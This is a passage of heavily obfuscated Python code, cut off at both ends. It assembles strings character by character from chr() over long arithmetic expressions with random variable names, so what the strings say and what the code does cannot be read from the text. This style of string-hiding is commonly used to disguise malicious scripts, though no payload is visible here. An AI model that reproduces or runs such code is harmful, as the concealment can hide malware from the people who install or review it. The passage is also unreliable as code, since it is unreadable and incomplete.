lsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+_____tajgegigotbw+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf)]));__________xduwwhhvdkdk=str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));___________safwypzdtyrq=str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));____________gwomkbigouww=str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));_____________wyuikauitlcd=str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));______________tcymyqjxmzbf=str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));_______________ycxcbtahqqol=str("".join(chr(__RSV) for __RSV in [(_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsr